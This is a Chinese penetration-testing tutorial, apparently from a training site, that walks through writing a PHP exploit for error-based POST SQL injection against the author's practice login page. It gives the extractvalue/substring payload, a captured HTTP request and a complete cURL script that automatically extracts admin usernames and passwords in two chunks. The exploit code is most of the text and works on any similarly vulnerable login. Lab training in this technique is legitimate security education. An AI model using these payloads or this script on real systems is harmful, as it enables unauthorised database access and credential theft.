1. 首页
  2. 渗透测试

[原创]WEB安全第七章exp编写篇03 POST注入exp编写

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

WEB安全第七章exp编写篇03 POST注入exp编写

上一篇注入exp的简单编写,这一篇 将会提高难度,写一些复杂的exp。


1.post注入编写
访问暗月靶机测试系统 登录页面存在报错注入

查询数据的的长度
‘and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#
因为 使用 extractvalue函数只能报错32长度的数据 通过上面语句 先获取数据的长度 再使用 substring进行数据截取。

暗月靶机

用php来编写exp
先用burpsuite 抓取数据包
POST /login.php HTTP/1.1
Host: www.moontester.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.moontester.com/login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
Connection: close
Cookie: PHPSESSID=k343qa72c7ro2psc0ivengqap6
Upgrade-Insecure-Requests: 1

username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280×23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95

2.模拟post进行url请求

[php]
<?php
/**
* 模拟post进行url请求
* @param string $url
* @param array $post_data
*/
function request_post($url = ”, $post_data = array()) {
if (empty($url) || empty($post_data)) {
return false;
}

$o = "";
foreach ( $post_data as $k => $v )
{
$o.= "$k=" . urlencode( $v ). "&" ;
}
$post_data = substr($o,0,-1);

$postUrl = $url;
$curlPost = $post_data;
$ch = curl_init();//初始化curl
curl_setopt($ch, CURLOPT_URL,$postUrl);//抓取指定网页
curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
$data = curl_exec($ch);//运行curl
curl_close($ch);

return $data;
}
?>

[/php]

使用curl需要php开启 curl扩展 extension=php_curl.dll

这个部分需要变成的字符要变成 php的数组。
username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280×23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=1234536&submit=%E7%99%BB%E5%BD%95
变成php数组
$post_data=array(“username”=>”‘and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#”,”password”=>”password=123456″,”submit”=>”%E7%99%BB%E5%BD%95″);

整个exp的代码

[php]
<?php
/**
* 模拟post进行url请求
* @param string $url
* @param array $post_data
*/
function request_post($url = ”, $post_data = array()) {
if (empty($url) || empty($post_data)) {
return false;
}

$o = "";
foreach ( $post_data as $k => $v )
{
$o.= "$k=" . urlencode( $v ). "&" ;
}
$post_data = substr($o,0,-1);

$postUrl = $url;
$curlPost = $post_data;
$ch = curl_init();//初始化curl
curl_setopt($ch, CURLOPT_URL,$postUrl);//抓取指定网页
curl_setopt($ch, CURLOPT_HEADER, 0);//设置header
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上
curl_setopt($ch, CURLOPT_POST, 1);//post提交方式
curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost);
$data = curl_exec($ch);//运行curl
curl_close($ch);

return $data;
}
#$post_data="username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280×23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95";
$post_data=array("username"=>"’and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");

function get_strlen($url){
$post_data=array("username"=>"’and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
$html = request_post($url,$post_data);
preg_match("/~(\d+)/", $html,$matches);
return $matches[1];

}

$url = "http://www.moontester.com/login.php";

$lengstr = get_strlen($url);

if($lengstr){
$payload =array("username"=>"’and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),1,32)))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
$html = request_post($url,$payload);
preg_match("/~#(.*?)\’/", $html,$matches);

$m1 = $matches[1];

$payload2 =array("username"=>"’and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),32,{$lengstr})))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");

$html = request_post($url,$payload2);

preg_match("/~(.*?)#/", $html,$matches);
$m2 = $matches[1];

echo "[+]".$m1.$m2."[+]";

}else{
echo "[-]error[-]";
}
# $html = request_post($url,$post_data);
# print $html;

[/php]

代码解释
先获取数据的长度
第一次获取1-32 第二次获取 32-40 的数据
两次获取的数据并接再一起输出。

[原创]WEB安全第七章exp编写篇03 POST注入exp编写

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/523.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息